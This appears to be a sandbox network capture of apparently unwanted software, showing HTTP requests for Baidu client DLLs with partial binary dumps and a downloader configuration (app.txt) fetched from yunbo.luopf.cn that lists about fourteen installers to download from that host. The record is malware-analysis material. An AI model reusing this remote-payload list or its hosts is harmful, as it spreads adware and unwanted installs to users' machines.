<font color="red">GET /client/dllws/BDMNet.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dl1sw.baidu.com<br>

Range: bytes=950272-<br>

Referer: hXXp://dl1sw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>

Expires: Wed, 27 Aug 2014 23:18:00 GMT<br>

Date: Mon, 28 Jul 2014 23:18:00 GMT<br>

Server: nginx<br>

Content-Type: application/octet-stream<br>

Last-Modified: Thu, 10 Apr 2014 08:10:19 GMT<br>

Cache-Control: max-age=2592000<br>

Accept-Ranges: bytes<br>

Content-Range: bytes 950272-1178447/1178448<br>

Content-Length: 228176<br>

Age: 1652555<br>

Via: 1.0 wzpy201:80 (Cdn Cache Server V2.0), 1.0 shiben9:8888 (Cdn Cache Server V2.0)<br>

Connection: close<br>

Content-Disposition: attachment;filename="BDMNet.dll"<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre>........"...................................@...........]5............<br>......,...............P[..........".......P.......<................<br>[email protected]......................................"..............<br>..........................[.......[.......[.."........................<br>................[.."....... ............................... \.."......<br>.L........................................................h..`...(....<br>...........0...............H...P;......................<...P..."...<br>....................................P\......[\......f\......q\......y\<br>.......\.......\.......\.......\.......\.......\.......\..".......L...<br>........................"....................................... ]....<br>..(]......0]......8]......@]......H].."...............................<br>.........].......].......].......].......].......].......].......]....<br>...].......].......^....</pre></font><br><br

<font color="red">GET /client/dllws/BDMNet.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dl1sw.baidu.com<br>

Range: bytes=622592-<br>

Referer: hXXp://dl1sw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>

Expires: Wed, 27 Aug 2014 23:18:00 GMT<br>

Date: Mon, 28 Jul 2014 23:18:00 GMT<br>

Server: nginx<br>

Content-Type: application/octet-stream<br>

Last-Modified: Thu, 10 Apr 2014 08:10:19 GMT<br>

Cache-Control: max-age=2592000<br>

Accept-Ranges: bytes<br>

Content-Range: bytes 622592-1178447/1178448<br>

Content-Length: 555856<br>

Age: 1652554<br>

Via: 1.0 wzpy201:80 (Cdn Cache Server V2.0), 1.0 shiben9:8888 (Cdn Cache Server V2.0)<br>

Connection: close<br>

Content-Disposition: attachment;filename="BDMNet.dll"<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre>.~..E.;.t.P.........s..}..}..}..F...PVQV.D$,[email protected]......~..<br>~..C....;..D$,....t....t.P.......L$$d......Y_^][.............Q......u.<br>......t....u.......t................uy...u ......u.V.t$.3.P...r.....^.<br>.......u#......u.V.t$......P...K.....^.........u............t......V.t<br>$.P.........^......j.h.`....QP.....P.D$.P......L$.Q..B...L$...........<br>..................V.........L$....D$..V.h.(..R.F..N..F...u........^...<br>...............V...F.#F....u..D$.....@.....^.......~..tSW...... ..N...<br>.F.3.;.w.r.;.s. .....w....v........3..L$.3....D$..._t.......H.^.......<br>L$.h.(..Q......N..V..F..t$....;.|....L$.;.r..D$.....@.....^.......T$.R<br>P.D$.P......L$..T$....j.h....QR......t$.......RP.........^............<br>...... V.t$(.~...D$......D$.....t;...... ..N..v.3. ...................<br>j.h....VQ.........^.. .3..D$..D$..D$.f.D$".D$(...P..f.D$....>....L$<br>(Q.T$.R.....f.D$.....L$(Q..f.D$.......T$(R.D$.P.....f.L$.....T$(f.L$.R<br>........D$(P.L$.Q.....f.T$..D$.VPf.T$*......L$..T$....j.h....QR.....f.<br>D$..D$.VP......L$..T$....j.h....QR.X...j.j<RP.....f.D$..D$.VP......<br>[email protected]$.QR.$...j.j<RP.....f.D$ .D$.P.L$.Q..d.....u.3.3....<br>.^.. [email protected]$..L$.........^<br>.. ..t$..L$.....^.. ...............j.h.R..d.....P..LSUVW.....3.P.D$`d.<br>....3.....D$8.D$<.D$p3.3.;..|$4.\$..\$ .\$.t..|$..D$4.o..$...;.tC.5<br>x...P..;.t6..$...;.u.3...Q....$....xD.t.;..l$ u.3...Q...@@.D.4....|$..<br>D$|#.$.....|$h;........L$$Q.L$x. ....D$(...vRWWW..\........t$.td.T$tR.<br>.......j.j.j..D$0j..D$4PV.T$@..`..........t2.l$..t.4....%..$.....u</pre><<< skipped >>></font><br><br

<font color="red">GET /client/dllw5/BDLogicUtils.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dl1sw.baidu.com<br>

Referer: hXXp://dl1sw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.0 200 OK<br>

Expires: Mon, 08 Sep 2014 06:25:46 GMT<br>

Date: Sat, 09 Aug 2014 06:25:46 GMT<br>

Server: nginx<br>

Content-Type: application/octet-stream<br>

Content-Length: 924496<br>

Last-Modified: Tue, 06 May 2014 06:31:30 GMT<br>

Cache-Control: max-age=2592000<br>

Accept-Ranges: bytes<br>

Age: 676481<br>

Via: 1.0 wzpy220:8080 (Cdn Cache Server V2.0), 1.0 shiben10:10001 (Cdn Cache Server V2.0)<br>

Connection: close<br>

Content-Disposition: attachment;filename="BDLogicUtils.dll"<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre>MZ......................@.............................................<br>..!..L.!This program cannot be run in DOS mode....$.......V.h.........<br>......x.....5.{.....5.k.......Y.......[.............5.h.f...5.t.C...5.<br>|.....5.z.............5.~.....Rich............................PE..L...<br>\.hS...........!.........0.......;....................................<br>... ......................................`.......|........P..........<br>........P....`[email protected]...@.............<br>...............................text............................... ..`<br>.rdata..Z...........................@[email protected]............<br>[email protected].........@....... [email protected]......<br>.0..............@[email protected].......`.......@[email protected]..........<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>..................................................................</pre><<< skipped >>></font><br><br

<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Range: bytes=19791872-<br>

Referer: hXXp://dlsw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:20:49 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 6212432<br>

Connection: close<br>

ETag: c7062e404128917808756500d58121ee<br>

Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>

Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>

Age: 127210<br>

Content-Range: bytes 19791872-26004303/26004304<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>

x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>

x-bs-meta-crc32: 2839405489<br>

Content-MD5: c7062e404128917808756500d58121ee<br>

x-bs-client-ip: MTgwLjc2LjIyLjc5<br><pre><Y...#~..e..Q.....@g.".u.K;.N.,O*y.Rx.8 t..N.4J...d`.MbU.p...;.....<br>.P6)..;m..q..$P.wm.N.pTU...K. "....$9..$...s.,yuU=.t.../.....u.t"H..E.<br>.......A.)F..%)c..d..Q.Mu.QV~.;..p..*..7..$`..,t..k.":0v..:.........S2<br>=.....w...^....4....'.t."..M...$Q18....<hl....z..bz."...gK.^.......<br>.E...".u...;..D.Q...Q..!....*s.SeP....m..A........J......w.....\.|Mo..<br>..B7?wJgu.......`.k....bi..%Q...E^....'..eu|[[email protected].(4B<br>....G.-..[..T....".7.....A...f...o.......^....H:.vq..._0....%.$m~...B.<br>...............f:SC4....z.....q.(...q.........h..........5.)...*._.{..<br>t.(=.....(..1.\R...n..R/...._.i6,U......8KA=...|... k(..V7.\..o.Kx.<<br>;.c....oM..c".k...|5O...U.2wec..N..0.....(....\.A.W..2.....#bt..O.a...<br>:%.K...69.3?....MKrZ.. .iIU..L..*..".4?'...k.k.r.F...9M...;-."Wo...F..<br>.J.X.6q.......g..RkL.L.}o..h6..xiG.N5.%..`P..'.w..q.Wt....3...dy...u..<br>yw.tJ...X1.[.}..?<........C....?.......d.P..S...7N.'`...&...N@*.W..<br>.@[email protected]:...>F..O....D.y.....B.[~>eH.R).?%eX..U.w..C6.!ss:./._ .<br>..K.P..-,..E.k.|. ].U.x...eQ.......(...9sp..-..ug........%...%..Uo...g<br>......"|{B9.C......[...T.....J...F'R%..[....Z.d..P..  [...3..I... .L..<br>..i<1t-$Z.B...D.-._R..;_....|I.8/?....e..d.~...36r..J..Q'..4A2}z...<br>[email protected]..,.....s....sP.p.$.J..RM....g.J.UR%<br>E..........dpg_....._..}...w.:..U;4...8/$.....8~....H..../.d..1....gf.<br>..M.K4...$W.J..]c..........>.|.3....1v.(.w2..5.x..'..XGa0'....Yy.Pt<br>.lh...?....7-.Y....M..~.i..}.!..V9.(....n.Vg....Dc..........l.>....<br>.....v=<....r.i!.m.Ir....#4.....-:...D.Ih.9z...'..'?3>$.....</pre><<< skipped >>></font><br><br

<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Range: bytes=20840448-<br>

Referer: hXXp://dlsw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:21:08 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 5163856<br>

Connection: close<br>

ETag: c7062e404128917808756500d58121ee<br>

Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>

Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>

Age: 127229<br>

Content-Range: bytes 20840448-26004303/26004304<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>

x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>

x-bs-meta-crc32: 2839405489<br>

Content-MD5: c7062e404128917808756500d58121ee<br>

x-bs-client-ip: MTgwLjc2LjIyLjc5<br><pre>K'...<.F...a...C.:V&....p...K....p..[....`.-.M......%...^).*[email protected]<<br>;Y......x.;;./^b9~6........=d8y&K... .......[..<.. )p.%......7l.6!h<br>.utM' ....g..6'..6..K.....S...'d.-.*.Y.`....%...|o........Nx.&.2.3.&yL<br>9HS.&t.1..l:$..5ShH.>..L...I...<1.9'.Q..5.X...... .*..".0.{.e*).<br>..../.....2.z\.i....3.E....6D.e...)...-.P..).j*V... J^..H.......P..F..<br>.V.....N....:.A-2^.}.I...\..V.c_\).....$~b......gU.....12.a.h.....s.T.<br>..:|.EUb...Y..t.GS[V.4....'...S.oX.. .]w......r..]Y..6....6\a......><br>;3=@. j7.d]......6.....p...3.Q..L.C....a|..](7u.t.jk[..N..eh7E.....:.%<br>.q. ....;.cRA.T^A.w.........G.$...Y..5}...4.T..i.qZ...g..!...^..o....W<br>U..QJ...SNS.VT....q....Qi.T.qU.T...I*[email protected].. .;a#wh.$..RJcu....#.w.g<br>...Y..K:9.'g..S.<..G.s...Q.V..........I..[...K...1J.i.W....%2.W- $.<br>4(,B2R....%..;c9......C..r..Z...L.q.a..J......."p......R.`.....-.k.4vb<br>..a..]9j..@)z.....2...._-r.aW../...Az.. ~.H..........H...x&.....!..l.3<br>.s.W...VKjx#.....0j.1.'..n.1.y..&.d{...Lv............n.n.O..r.2(>.X<br>.)(..)CE...q....,.5.......3.b..nmr.....x._....F..r~...S.7OXl.....42 .h<br>.....W)$W..CU.q.....=..S..n@>.i....&nY....2.M..-.V[.I/.........U...<br>u..0..U|-...?F.k.7...M..l1^.$D~..........^.......8..=.Oc.....J..^... '<br>l5.o:.a.4..\Q....U......_=..Y...c:Ro..{..D..V:T.....[j(B.....id'....]6<br>M..tw...O\....?....Hlw..znz.g:l.)......._.T.K.nJ....G...V...E.%. V><br>.a14....OI..V<..m^GDW... ......."J..D.a....z.i$.M...)...G.....`T1..<br>H...T.......<......>t.q.../F.e....?..C.2.<.2..o..`[email protected]<br>/i....`.V...<.......e..V..2s,...c1.Ry........B*..r^...$T..hw..x</pre><<< skipped >>></font><br><br

<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Range: bytes=21889024-<br>

Referer: hXXp://dlsw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:21:17 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 4115280<br>

Connection: close<br>

ETag: c7062e404128917808756500d58121ee<br>

Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>

Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>

Age: 127238<br>

Content-Range: bytes 21889024-26004303/26004304<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>

x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>

x-bs-meta-crc32: 2839405489<br>

Content-MD5: c7062e404128917808756500d58121ee<br>

x-bs-client-ip: MTgwLjc2LjIyLjc5<br><pre>?.q.....X.;.A....j _...........[..>h'..../.3(/i......m......{.U...:<br>......b......J........eK..d./..RR_..O....E......o.]._s.'6.....1$..M^..<br>@..]..QC"v..d..X..s./.............<.Z(.(.d.0.Z....6...n..f......H6.<br>.{T...Ma...O..Gk\-....G...4".HI.?.}.....~r...X...\...'..M...H...tnsh..<br>...z....)...2.........)B.'.~V..7..Qx.d..&C.b..XJ...,k\.HwF...P...u.E..<br>J..qT...;...i..........O....y....e.}H...F..y4......2....y}.}...T.&...=<br>.P..G........'9...mT.>.8.d...a..F..;..=N..m.`Z.= ..%...M.".....?y.,<br>S.yZ..x..v..e..Ut.BoN....%....Aj.5>.....3..B.K..Tg.7.../)....m...=.<br>...!..<Iw.W........-x..&&....-.<.{.p.h.pp....E...c...b.d..Np-.q.<br>.. .-.VgZ.....^E%a..!...,....,..xaCoA.}.-.qf).Y4k.ZG..Q...-nhq.....-..<br>F8...G.......L.....$Ox}.......;...5(Y."..;D...kV.......i........g7...8<br>[email protected][email protected]}....v...U.E.!....`P...'>.-..}<...#.=Hn.s..<br>.._...E.)D...-9....."t..</[email protected]<br>p4.)....s.R..QR..:.fQ..:....T..B(F[n.(......v..4C......5..UM...r.!uf./<br>[?.7 w....m.@/.n...O3..:...A..........~.ZQ~7...YEY...D.4..KZ....up....<br>.. ........#.eS..^................)..1............y..V.6.G....h.....Y.<br>..ia.j9......HR.4*....nJg..8.<&..|....M.....q.].....0.J..#...2{....<br>..........u.............z#...E...r.5...V.d...p./......:B..|H..$h.@J...<br>..gd........H.Z..PU.. C...G......>.5Z..G.....Vx...U.W.?Bw....t..Z.{<br>.:....".H{.\C'.?.N...g.$.*.a.^ '..X.{.....2D... ......#x..yO....R*e.Y.<br>.S............x...O...>..v.:..j.y.l.?.a..5..&E..^.Qq...>C..2.l..<br>._-..... mWs'...1...V..c...:.REd..M....T..u[.......Y... ..x...0..?</pre><<< skipped >>></font><br><br

<font color="red">GET /client/dllw5/BDLogicUtils.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dl1sw.baidu.com<br>

Range: bytes=327680-<br>

Referer: hXXp://dl1sw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>

Expires: Mon, 08 Sep 2014 06:25:46 GMT<br>

Date: Sat, 09 Aug 2014 06:25:46 GMT<br>

Server: nginx<br>

Content-Type: application/octet-stream<br>

Last-Modified: Tue, 06 May 2014 06:31:30 GMT<br>

Cache-Control: max-age=2592000<br>

Accept-Ranges: bytes<br>

Content-Range: bytes 327680-924495/924496<br>

Content-Length: 596816<br>

Age: 676482<br>

Via: 1.0 wzpy220:8080 (Cdn Cache Server V2.0), 1.0 shiben10:10001 (Cdn Cache Server V2.0)<br>

Connection: close<br>

Content-Disposition: attachment;filename="BDLogicUtils.dll"<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre>w...;.s.;...r..... .r..G....G.QRP.:W.......u.;.r.;......}..D$.;x.u....<br>...?.\$..t$..Y....|$....I..M...t..E. ....9D$.r.......M..T$.9|..t~.D$.;<br>x.u........ .._.r..W....W..D$(.p....A.;.s...;...r....D$(.x..r.........<br>..QRP..V.......u.;.r.;......|..D$.;x.u..c....?.[....t$...t.;.t..K....L<br>$.;.t..D$$.x._.0.p.^].H.[.........K..D$$_^..]...X..P..H.[.............<br>..UVW.|$...9~.s.......l$.... F.;.w..`...........S.^......v..H....F.;.s<br>%.N.QS................F....r2.V..T$..0..u.....^.r..F...[_..^]....F.[_.<br>....^]....N..L$....r..N....N..V. .R.T$... .R ...P..Q......D$,...PUW...<br>.....~...^.r..F.....[_..^]....F.....[_..^]......U.l$...VW..t.;l$.t....<br>...t$..T$ ;.t'.G. .............S..1~.QRQV........._.[.D$._.p.^.(].....<br>....SUVW.|$.....u.......\$.;_.u.......C.P............N...t..F. ....;.r<br>..Y....N.9\..ul..t..F. ....;.r..;....V..l...^...u..(....#...;k.u......<br>.N....m.t..F. ....;.r.........F.....\$..l..t.....s....l$.;]..\$.u.....<br>.;^..;t..C..8...S.S.Q..........F...D$..x._^.(][...V...N......N..I.;F..<br>F.....t.W.I..8P.z......;~...u._.F.P.f.......F.....^..........L$..T$.V.<br>t$... ..........W.... .;.t. ..y....;..<..y..|..u._^...SV...~4.r..F <br>P........3..F4.....^0.^ .~..r..N.Q.........^..F......^.^[.............<br>S.\$.VWS............|$.u.......V.;..t$.t....O.;.w.r..C.;G.|..L$....T$.<br>.t$..L$....D$ .I._^...H.[...............D$....SUVWP........K.....t..C.<br> ....;.r..$....K..|...k...u.......l$..|$.......I..K...t..C. ....;.r...<br>....S.9|..........u......;}.u.......D$(...G...:.u...t..P.:Q.u.........<br>u.3..........}.;}.u.......?..;}..|$.u..{....T$(.O......:.u...t..P.</pre><<< skipped >>></font><br><br

<font color="red">GET /sw-search-shadu/client/dllv3/BDMReport.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Range: bytes=1114112-<br>

Referer: hXXp://xf.baidu.com<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:20:32 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 93408<br>

Connection: close<br>

ETag: 30cbc602ada7cdfb0346038c05996d84<br>

Last-Modified: Thu, 20 Jun 2013 06:27:51 GMT<br>

Expires: Mon, 18 Aug 2014 14:59:38 GMT<br>

Age: 127254<br>

Content-Range: bytes 1114112-1207519/1207520<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: 21BEDF37C0B754EE14FE2C8B0543B5C0<br>

x-bs-request-id: MTAuNTguMzQuMTk6ODA4MDoxMzEyMjA1MTYxOjI4L0p1bC8yMDE0IDIyOjU5OjA1IA==<br>

x-bs-meta-crc32: 2965621797<br>

Content-MD5: 30cbc602ada7cdfb0346038c05996d84<br>

x-bs-client-ip: MTgwLjc2LjIyLjExNQ==<br><pre>[email protected][email protected].........<br>..........................".......@...................................<br>........0................... [email protected].........................<br>.............."...................................".......(...........<br>......................................................................<br>..................................@...................................<br>................"...................................................".<br>...............................</pre></font><br><br

<font color="red">GET /app.txt HTTP/1.0<br>

Host: yunbo.luopf.cn<br>

User-Agent: NSISDL/1.2 (Mozilla)<br>

Accept: */*<br>

<br>

</font><br><font color="blue">HTTP/1.1 200 OK<br>

Content-Length: 1321<br>

Content-Type: text/plain<br>

Last-Modified: Fri, 25 Jul 2014 03:40:40 GMT<br>

Accept-Ranges: bytes<br>

ETag: "1e984b34baa7cf1:32d"<br>

Server: Microsoft-IIS/6.0<br>

Date: Sun, 17 Aug 2014 02:20:16 GMT<br>

Connection: close<br><pre>[xxx1]..aa=souhu..bb=guagua_77150006814.exe..cc=hXXp://yunbo.luopf.cn/<br>guagua_77150006814.zip..dd=..[xxx2]..aa=..........bb=pczh_107_306.exe.<br>.cc=hXXp://yunbo.luopf.cn/pczh_107_306.zip..dd=..[xxx3]..aa=....fm..bb<br>=wwwww_3340.exe..cc=hXXp://yunbo.luopf.cn/wwwww_3340.zip..dd=..[xxx4].<br>.aa=sd..bb=spkjrjp_30279.exe..cc=hXXp://yunbo.luopf.cn/spkjrjp_30279.z<br>ip..dd=..[xxx5]..aa=tianqi..bb=tqrlsimp27_dubo_001.exe..cc=hXXp://yunb<br>o.luopf.cn/tqrlsimp27_dubo_001.zip..dd=..[xxx6]..aa=......bb=adwoca_00<br>005.exe..cc=hXXp://yunbo.luopf.cn/adwoca_00005.zip..dd=..[xxx7]..aa=bd<br>yy..bb=BaiduPlayerNetSetup_429.exe..cc=hXXp://yunbo.luopf.cn/BaiduPlay<br>erNetSetup_429.zip..dd=..[xxx8]..aa=jinritianqi..bb=Dailytq_s[134].exe<br>..cc=hXXp://yunbo.luopf.cn/Dailytq_s[134].zip..dd=..[xxx9]..aa=QQ..bb=<br>QQPCDownload70259.exe..cc=hXXp://yunbo.luopf.cn/QQPCDownload70259.zip.<br>.dd=..[xxx10]..aa=gouwu..bb=bestoffers_1[1].3.6.8_cn.exe..cc=hXXp://yu<br>nbo.luopf.cn/bestoffers_1[1].3.6.8_cn.zip..dd=..[xxx11]..aa=zhezi..bb=<br>zhezi_setup_Z6F9.exe..cc=hXXp://yunbo.luopf.cn/zhezi_setup_Z6F9.zip..d<br>d=..[xxx12]..aa=......bb=ADMon.29068.exe..cc=hXXp://yunbo.luopf.cn/ADM<br>on.29068.zip..dd=..[xxx13]..aa=......bb=dmmenu.29071.exe..cc=hXXp://yu<br>nbo.luopf.cn/dmmenu.29071.zip..dd=..[xxx14]..aa=..........bb=setup_462<br>9_p3c0.exe..cc=hXXp://yunbo.luopf.cn/setup_4629_p3c0.zip..dd=..</pre><<< skipped >>></font><br><br

<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Range: bytes=22937600-<br>

Referer: hXXp://dlsw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:21:23 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 3066704<br>

Connection: close<br>

ETag: c7062e404128917808756500d58121ee<br>

Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>

Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>

Age: 127244<br>

Content-Range: bytes 22937600-26004303/26004304<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>

x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>

x-bs-meta-crc32: 2839405489<br>

Content-MD5: c7062e404128917808756500d58121ee<br>

x-bs-client-ip: MTgwLjc2LjIyLjc5<br><pre>.....<....F_.h........."..0.. Vc.........\MT...k.bZ..r..u. ..g...g.<br>| g0-._....rm.....|...!|..[..E.Ht>t-......}......3/..F.e.....e..)B.<br>.........I.._...ir....W...Y._......9l:I6..v..)0}*...-^....p~..7..),...<br>.F2.n*...xYS.1n....{*....Be".....t... a.....W..z.i.......q.W......bjo.<br>P;2...z....h ".....}.G.....C...Z...m...(.5...].N(.."../..S..gFX...q...<br>>f.S......^.....*.4|Fy.-..T.A.....J"."..v..9.d.Z..VQ...x>.I....w<br>.7.......S....l.u.%.N.......2.6....J...'.<P....3...[^.[.._l..6.2!..<br>R9.e...<..Ws*.q#..j..P..0G.cq....:..2....;.g.#qo..U.....%....a...-.<br>S...lkiD...F...c...`..........V\..tg3|{u.T/..]..X..`(...........[)oB.O<br>..oh.O.....q..n.b..m<;..C8..,?..!N..KX.......i...;..........N.....I<br>.ah8..*.....lD.....:..S..V*..;..=...M...ny;....Sq.?mY.....Nb.&e..[.Q..<br>.<R.Q.1Pa.....l.........m.g.......'|... ......3....<..........S3<br>...$...<..5.b.?Z.l.1......9.......t...............Rq..sH..#..T..5O.<br>..{.."..$..R...lA......8...*..S....$.........K.%....W.... L..5......%.<br>bu.......?..Q......9C.Z?.j..3..Id.....D.h=....s...\...X....S../t.os..r<br>..C./..`.d..x.1....K_9..&..{_..n...]..2.:a.8..2>i...... .2..W......<br>....z.1..*.Q5E7U.`....J...(...;..p..f......:.u.......J.....k. S.......<br>.-\;.._N.ob...........?.Y...K...).T...LHX....u?<f..H0v....eEp.}..Ie<br>[email protected]...&Au.m...S.T...J...g.n.............B...:.z/..o....<br>...e.h.F2.21]....!M..vK56..Xy......D.....3...5....qs..V.......q.pT[N/.<br>..Y..t*., f.f...yd......|.~.&s...Lsj&..#...w.*.W...[.I0.i.w<[....s.<br>....BrK.\.1......i..Ep.....s....)=.].0..SL.u......9.S.......v.:..X</pre><<< skipped >>></font><br><br

<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Range: bytes=20054016-<br>

Referer: hXXp://dlsw.baidu.com/<br>

